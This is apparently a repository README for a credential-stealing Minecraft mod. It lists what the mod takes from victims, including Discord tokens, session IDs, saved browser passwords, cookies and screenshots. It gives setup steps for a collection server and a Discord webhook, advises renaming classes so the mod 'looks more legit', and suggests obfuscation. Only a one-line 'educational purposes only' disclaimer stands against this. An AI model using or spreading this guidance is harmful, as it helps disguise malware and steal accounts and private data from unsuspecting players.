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99 lines (87 loc) · 7.99 KB

File metadata and controls

99 lines (87 loc) · 7.99 KB




All previous issues should be solved with the latest release


  • Impossible to delete the webhook
  • Good spam protection
  • Grabs
    • IP
    • Minecraft Session ID
    • Discord Tokens from:
      • Discord
      • Discord PTB
      • Discord Canary
      • Lightcord
      • Every popular chromium based browser
    • Saved browser passwords
    • Cookies
    • Browser history
    • Desktop screenshot
    • Minecraft accounts saved in lunar client
    • Minecraft accounts saved in essential
  • Bypasses the restrictions on the max allowed key lenght
  • Isn't reliant on any third party file hosting service like Anonfiles or Gofile
  • Embeds and webhook customizable, no watermark



Host on a VPS

  1. Download the repository
  2. Put everything inside the server folder in any directory on your VPS
  3. Edit server/config.json to your liking
  4. Install python/pip and all the requirements from server/requirements.txt
  5. Run server/


Host on render

  1. Make a private fork of this repository (Do NOT click fork on github, you have to download and reupload to a private repo)
  2. Edit server/config.json to your liking
  3. Create a new render account with the GitHub account you forked the repository with
  4. Create a new web service
  5. Select the forked repository
  6. Put in a name for the service, select main as the branch, server as the root directory, Python 3 as runtime, Build command pip install -r requirements.txt and Start command python or python3
  7. Wait for the service to build


  1. Download the repository
  2. Change the Server IP in scr/main/java/dev/schubilegend/ to the IP of your VPS / URL of your render service
  3. Optional: Change the names of the classes/folders to make it look more legit
  4. Compile the mod (JDK 17 in your gradle settings and JDK 8 in your project settings)


  1. Download the release
  2. Change the URL / IP of the mod to yours using a java string editor or Recaf (Look for "YOUR URL HERE")
  3. Save and download the mod

Optional: Obfuscate the mod

If you have too much money use jnic native obfuscator for uncrackble obfuscation

If everything works for you please ⭐ this repo to support it ❤️


You can customize the spam protection and the design of the embeds by editing server/config.json.
The config is not reloaded automatically, so you have to restart the server for the changes to take effect.

Name Possible values Description
webhook Any discord webhook URL The webhook the info is sent to
webhook_name Any string, max 80 characters The name the webhook will have when sending the info
webhook_avatar Any URL to a PNG or JPG file The avatar the webhook will have when sending the info
message Any string, max 2000 characters The message the webhook will send with the info. %IP% will automatically be replaced with the IP of the client
codeblock_type small or big The type of codeblock used for the embed fields
ip_ratelimit Any number The number of times a client can send a request before getting rate-limited
reset_ratelimit_after Any number The number of minutes a client has to wait after getting rate-limited before sending another request
mc_embed_color Any hex color code The color of the Minecraft embed
mc_embed_title Any string, max 256 characters The title of the Minecraft embed
mc_embed_footer_text Any string, max 2048 characters The footer text of the Minecraft embed
mc_embed_footer_icon Any URL to a PNG or JPG file The footer icon of the Minecraft embed
discord_embed_color Any hex color code The color of the Discord embed
discord_embed_title Any string, max 256 characters The title of the Discord embed
discord_embed_footer_text Any string, max 2048 characters The footer text of the Discord embed
discord_embed_footer_icon Any URL to a PNG or JPG file The footer icon of the Discord embed
password_embed_color Any hex color code The color of the password embed
password_embed_title Any string, max 256 characters The title of the password embed
password_embed_footer_text Any string, max 2048 characters The footer text of the password embed
password_embed_footer_icon Any URL to a PNG or JPG file The footer icon of the password embed
file_embed_color Any hex color code The color of the file embed
file_embed_title Any string, max 256 characters The title of the file embed
file_embed_footer_text Any string, max 2048 characters The footer text of the file embed
file_embed_footer_icon Any URL to a PNG or JPG file The footer icon of the file embed
validate_session true or false If requests containing a invalid session id or one that isn't matching the uuid/ign of the minecraft account should be blocked


I am not responsible for any damage caused by this program. This is for educational purposes only. Use at your own risk.

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